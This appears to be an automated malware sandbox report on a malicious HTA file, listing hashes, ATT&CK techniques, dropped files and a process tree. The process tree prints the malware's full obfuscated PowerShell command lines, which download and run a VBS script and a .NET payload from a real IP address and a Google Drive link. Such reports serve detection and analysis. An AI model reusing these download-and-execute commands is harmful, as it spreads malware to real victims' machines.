4145c6882b855cfbe79cbe9f9359260d503b0733ef6c901a9f62dd273568e662

General

Target

logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta
Size

130KB
MD5

16e67de00d1302e9720892be8ab6a06c
SHA1

8e8ee3df01c4fb6efd9a5289f48b9795c2483063
SHA256

4145c6882b855cfbe79cbe9f9359260d503b0733ef6c901a9f62dd273568e662
SHA512

fe6d68bc44f8b2243e1f02e77bf4c39c1ddfe4b2c0ccbf2051da7d10641d06b1da5756e1e89806c09cdad06ea9ca4074a18e98416ece919dbdda55e530a19b0a
SSDEEP

96:Eam7B6DJU946WJU92EYDF/9MM9/y80636sJU956t7T:Ea2wDJGWJtEYpJqsJtRT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

POWeRShEll.exepowershell.exe

flow pid process

3 2692 POWeRShEll.exe
6 2888 powershell.exe
8 2888 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2056 powershell.exe
2888 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

POWeRShEll.exepowershell.exe

pid process

2692 POWeRShEll.exe
2548 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
3	2692	POWeRShEll.exe
6	2888	powershell.exe
8	2888	powershell.exe

pid	process
2056	powershell.exe
2888	powershell.exe

pid	process
2692	POWeRShEll.exe
2548	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

POWeRShEll.exepowershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRShEll.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

POWeRShEll.exepowershell.exepowershell.exepowershell.exe

pid process

2692 POWeRShEll.exe
2548 powershell.exe
2692 POWeRShEll.exe
2692 POWeRShEll.exe
2056 powershell.exe
2888 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2692	POWeRShEll.exe
2548	powershell.exe
2692	POWeRShEll.exe
2692	POWeRShEll.exe
2056	powershell.exe
2888	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

POWeRShEll.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2692	POWeRShEll.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	2888	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePOWeRShEll.execsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2644 wrote to memory of 2692	2644	mshta.exe	POWeRShEll.exe
PID 2644 wrote to memory of 2692	2644	mshta.exe	POWeRShEll.exe
PID 2644 wrote to memory of 2692	2644	mshta.exe	POWeRShEll.exe
PID 2644 wrote to memory of 2692	2644	mshta.exe	POWeRShEll.exe
PID 2692 wrote to memory of 2548	2692	POWeRShEll.exe	powershell.exe
PID 2692 wrote to memory of 2548	2692	POWeRShEll.exe	powershell.exe
PID 2692 wrote to memory of 2548	2692	POWeRShEll.exe	powershell.exe
PID 2692 wrote to memory of 2548	2692	POWeRShEll.exe	powershell.exe
PID 2692 wrote to memory of 3024	2692	POWeRShEll.exe	csc.exe
PID 2692 wrote to memory of 3024	2692	POWeRShEll.exe	csc.exe
PID 2692 wrote to memory of 3024	2692	POWeRShEll.exe	csc.exe
PID 2692 wrote to memory of 3024	2692	POWeRShEll.exe	csc.exe
PID 3024 wrote to memory of 796	3024	csc.exe	cvtres.exe
PID 3024 wrote to memory of 796	3024	csc.exe	cvtres.exe
PID 3024 wrote to memory of 796	3024	csc.exe	cvtres.exe
PID 3024 wrote to memory of 796	3024	csc.exe	cvtres.exe
PID 2692 wrote to memory of 2036	2692	POWeRShEll.exe	WScript.exe
PID 2692 wrote to memory of 2036	2692	POWeRShEll.exe	WScript.exe
PID 2692 wrote to memory of 2036	2692	POWeRShEll.exe	WScript.exe
PID 2692 wrote to memory of 2036	2692	POWeRShEll.exe	WScript.exe
PID 2036 wrote to memory of 2056	2036	WScript.exe	powershell.exe
PID 2036 wrote to memory of 2056	2036	WScript.exe	powershell.exe
PID 2036 wrote to memory of 2056	2036	WScript.exe	powershell.exe
PID 2036 wrote to memory of 2056	2036	WScript.exe	powershell.exe
PID 2056 wrote to memory of 2888	2056	powershell.exe	powershell.exe
PID 2056 wrote to memory of 2888	2056	powershell.exe	powershell.exe
PID 2056 wrote to memory of 2888	2056	powershell.exe	powershell.exe
PID 2056 wrote to memory of 2888	2056	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2644
- C:\Windows\SysWOW64\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe
  "C:\Windows\sYSTEM32\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe" "poWERSheLl.exE -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT ; IEX($(Iex('[sySTEM.tEXT.EnCODIng]'+[Char]0X3A+[cHAR]58+'utF8.geTsTRINg([SYStem.coNverT]'+[char]0X3A+[Char]0X3A+'FrombaSE64sTRInG('+[char]34+'JDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQkVyZGVmSW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZU9odnlRR28sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBabnF2ekZSdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF3QnJheXl5LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBycEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1QlMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRldOQnIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYWxBbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzQzL25ld3RoaW5nc3dpdGhncmVhdGZ0dXJ1ZXdpdGhncmVhdGRheXdlbGxiZXR0ZXJmb3JtZS50SUYiLCIkZU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMiLDAsMCk7c3RBclQtU0xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMi'+[chAr]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2548
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fn37zcet.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB7F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFB7E.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:796
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingswithgreatfturuewithgreatdaywell.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpjb01TUEVDWzQsMTUsMjVdLWpPaW4nJykoKCgnZ1VkaW1hZ2VVcmwgPSBHNUlodHRwczovL2RyaXZlLmcnKydvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkonKydKdjFGNnZTNHNVT3libkgtc0QnKyd2VWhCWXd1ciBHNUk7Z1Vkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVuJysndDtnVWRpbWEnKydnZUJ5dGVzID0gZ1Vkd2ViQ2xpZScrJ250LkRvd25sb2FkRGF0YShnVWRpbWFnZVVybCk7Z1VkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZycrJ1VkaW1hZ2VCeXRlcyk7Z1Vkc3RhcnRGbGFnID0gRzVJPDxCQVNFNjRfU1RBUlQ+Pkc1STtnVWRlbmRGbGFnID0gRzVJPDxCQVNFNjRfRU5EPj5HNUk7Z1Vkc3RhcnRJbmRleCA9IGdVZGltYWdlVGV4dC5JbmRleE9mKGdVZHN0YXJ0RmxhZyk7Z1VkZW5kSW5kZXggPSBnVWRpJysnbWFnZVRleHQuSW5kZXhPZihnVWRlbmRGbGFnKTtnVWRzdGFydEluZGV4IC1nZSAwIC1hbmQgZycrJ1UnKydkZW5kSW5kZXggLWd0IGdVZHN0YXJ0SW5kJysnZXg7Z1Vkc3QnKydhcnRJbmRleCArPSBnVWQnKydzdGFydEZsYWcuTGVuZ3RoO2dVZGJhc2U2NCcrJ0xlbmd0aCA9IGdVZGVuZEluZGV4IC0gZ1VkJysnc3RhcnRJbmRleDtnVWRiYXNlNjRDb21tYScrJ25kID0gZ1VkJysnaW1hZ2VUZXh0LlN1YnN0cmluZycrJyhnVWRzdGFyJysndEluZGV4LCAnKydnVWRiYXNlNjRMZW5ndGgpO2dVZGJhc2U2NFJldmVyc2VkICcrJz0gLWpvaW4gKGdVZGJhc2U2NENvbW1hbmQuJysnVG9DaGFyQXJyYXkoKSBXQlggRm9yRWFjaC1PYmplY3QgeyBnVWRfIH0pWy0xLi4tKGdVZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07Z1VkY29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhnVWRiYXNlNjRSZXZlcnNlZCcrJyk7Z1VkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMJysnb2FkKGdVZGNvbW1hbmRCeXRlcyk7Z1VkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHNScrJ0lWQUlHNScrJ0kpO2dVJysnZHZhaU1ldGhvZC5JbnZva2UoZ1VkbnVsbCwgQChHNUl0eHQuUkZERFJDJysnTC8zNC8xNDEuNjcxLjMuMjkxLy86cHR0aEc1SSwgRzVJZGVzJysnYXRpdmFkb0c1SSwgRzVJZGVzYXRpdmEnKydkb0c1SSwgRzVJZGVzYXRpdmFkb0c1SSwgJysnRzVJQ2FzUG9sRzVJLCBHNUlkZXNhdGl2YWRvRzVJLCBHNUlkZXNhdGl2YWRvRzVJLEc1SWRlc2F0aXZhZG9HNUksRzVJZGVzYXRpdmFkb0c1SSxHNUlkZXNhdGl2JysnYWRvRzVJLEc1SWRlc2F0aXZhZG9HNUksRzVJZGVzYXRpdmFkb0c1SSxHJysnNUkxJysnRzVJLCcrJ0c1SWRlc2F0aXYnKydhZG9HNUkpKTsnKSAtY1JlUExBQ0UgICdHNUknLFtDSGFyXTM5IC1jUmVQTEFDRSdnVWQnLFtDSGFyXTM2LWNSZVBMQUNFICAoW0NIYXJdODcrW0NIYXJdNjYrW0NIYXJdODgpLFtDSGFyXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2056
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:coMSPEC[4,15,25]-jOin'')((('gUdimageUrl = G5Ihttps://drive.g'+'oogle.com/uc?export=download&id=1AIVgJJ'+'Jv1F6vS4sUOybnH-sD'+'vUhBYwur G5I;gUdwebClient = New-Object System.Net.WebClien'+'t;gUdima'+'geBytes = gUdwebClie'+'nt.DownloadData(gUdimageUrl);gUdimageText = [System.Text.Encoding]::UTF8.GetString(g'+'UdimageBytes);gUdstartFlag = G5I<<BASE64_START>>G5I;gUdendFlag = G5I<<BASE64_END>>G5I;gUdstartIndex = gUdimageText.IndexOf(gUdstartFlag);gUdendIndex = gUdi'+'mageText.IndexOf(gUdendFlag);gUdstartIndex -ge 0 -and g'+'U'+'dendIndex -gt gUdstartInd'+'ex;gUdst'+'artIndex += gUd'+'startFlag.Length;gUdbase64'+'Length = gUdendIndex - gUd'+'startIndex;gUdbase64Comma'+'nd = gUd'+'imageText.Substring'+'(gUdstar'+'tIndex, '+'gUdbase64Length);gUdbase64Reversed '+'= -join (gUdbase64Command.'+'ToCharArray() WBX ForEach-Object { gUd_ })[-1..-(gUdbase64Command.Length)];gUdcommandByt'+'es = [System.Convert]::FromBase64String(gUdbase64Reversed'+');gUdloadedAssembly = [System.Reflection.Assembly'+']::L'+'oad(gUdcommandBytes);gUdvaiMethod = [dnlib.IO.Home].GetMethod(G5'+'IVAIG5'+'I);gU'+'dvaiMethod.Invoke(gUdnull, @(G5Itxt.RFDDRC'+'L/34/141.671.3.291//:ptthG5I, G5Ides'+'ativadoG5I, G5Idesativa'+'doG5I, G5IdesativadoG5I, '+'G5ICasPolG5I, G5IdesativadoG5I, G5IdesativadoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G5Idesativ'+'adoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G'+'5I1'+'G5I,'+'G5Idesativ'+'adoG5I));') -cRePLACE 'G5I',[CHar]39 -cRePLACE'gUd',[CHar]36-cRePLACE ([CHar]87+[CHar]66+[CHar]88),[CHar]124))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESFB7F.tmp

Filesize
1KB

MD5
a07e96bb33a12aa9d272cd6d75ce006e

SHA1
ee28d46528aa51cfe07a4d28bd3b5cfae27fcc01

SHA256
e96422f584eb2ae13f977c82d7d74a956a0a340b8817233988ba8280e5c9e1f0

SHA512
1cf8c06cd03bcf1bbcb984c7b745fe9c69240c22af884f798d821b3dc6573bd0aca9005496276b3c24b62e3a0bcb184e6d7052b8b4004f4fe94abb506d39f591

Download Submit
C:\Users\Admin\AppData\Local\Temp\fn37zcet.dll

Filesize
3KB

MD5
e6e5e0d1576a5f5e093770e6e05b6849

SHA1
dcadf615f6c9761b5f48cd93f4477b0300462003

SHA256
65bf786c4d99f3cf501002bfad7f6a9e3690580191233554cb01a1d8b55e05f7

SHA512
cf880ec7957f8a3dfcfe47cf28d7a3a855b6b467055b5434c9255f78505103af4d07a289c0584f51943d049501a190440b7b02e08f9c62ff670f73b67d962b8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\fn37zcet.pdb

Filesize
7KB

MD5
4899363f665cb06421bda10424da6855

SHA1
b86ea1aa41d9515fa6b03f808024bdc63558ed74

SHA256
b4b83ea28a78673d5bf444a7ac17af3aac0b75fde5eda5f89054d8fc3e9087f1

SHA512
790a063d162a17713b30bfd0a10a984920601369ab6a780983223717862738443455431b7ecdc5eff58b330a5d9e432d4f7f18b94816019e80f34d4ae53fe882

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
581f4a0c418351c81eb278f1eab0315b

SHA1
b28c851702578d78bddb9fb50717b1026f037755

SHA256
83da60531d570c549dfa0d792d8d58703001040562d6ae7d9f21ecf14e279e98

SHA512
fbefe9b95e2d522a426ce013f3b3f4da23148882cf08195a534a823a33282bc55eedf67fdd9c415f2a65d2c1250f60f5456cefe69a7cdb9b36c540569d36139d

Download Submit
C:\Users\Admin\AppData\Roaming\newthingswithgreatfturuewithgreatdaywell.vbs

Filesize
136KB

MD5
655d556c1a60114b9c1df43ca2d1b4e9

SHA1
c339a1fb6445b5a5701ef091b328727d2e0cd894

SHA256
8895b5c34239ed56abf05b8a381be9153b25baea8167aafceafec196375cd983

SHA512
5bcb9c205e7337199e6f7c8e261fe83d1202e6d0aa084648d6d3c00e4c970d47fdbb759494e9c1b9b0347d23d24c4fd561fea17247fec9c81ca3b124b09263ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFB7E.tmp

Filesize
652B

MD5
4d6447dc7f4408339737a71f748e2a28

SHA1
2ed10389a8e6977cf4013925ca4c04b5c92bebc0

SHA256
49d6d1f7e59de8e03d9f125b170467a559481891a44bd7bc4854bda0a5c089ef

SHA512
196c1e1ec501bed198574d00761e8c279d1dce672fae54cdd7e2bddc288d93adf5a19b9ad5342f78481a667ed0fba52de6d43c497de787bd3dc27998650d5d89

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fn37zcet.0.cs

Filesize
469B

MD5
b89fa3ea83594e6aed2a1cbc2ab03515

SHA1
2457f05ae6c56c192ad5d7c76694e7898ada53f8

SHA256
bd9c1570cad7cf95c39fa2a8be51a8851239e7f5cbf0bad032292f733fded0a0

SHA512
bf0334f84f3de804f868d3b447eaf98e9d6679b52015ac814cb8d71e2d3fdc90f482bfe5f2801f25a5bef0de53da747028e3d28149ac5fd5ec3cc835ca8c37aa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fn37zcet.cmdline

Filesize
309B

MD5
f55bfae65f697c4829e40e94a639a245

SHA1
e293f5ed3125aa348a82a934449676bf44ee6849

SHA256
9cc8a4747d62f72c63f4931dcd9b514a7a94a61f4150210538b1892efc9792da

SHA512
539f22638b7a527e877b2b9e35ba15eafd8ba0babfff9bc7558287fb486d930ec5e65afaab2e4e0438484952da96a640bc34f9d82305c2257a5fc6c40f923065

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads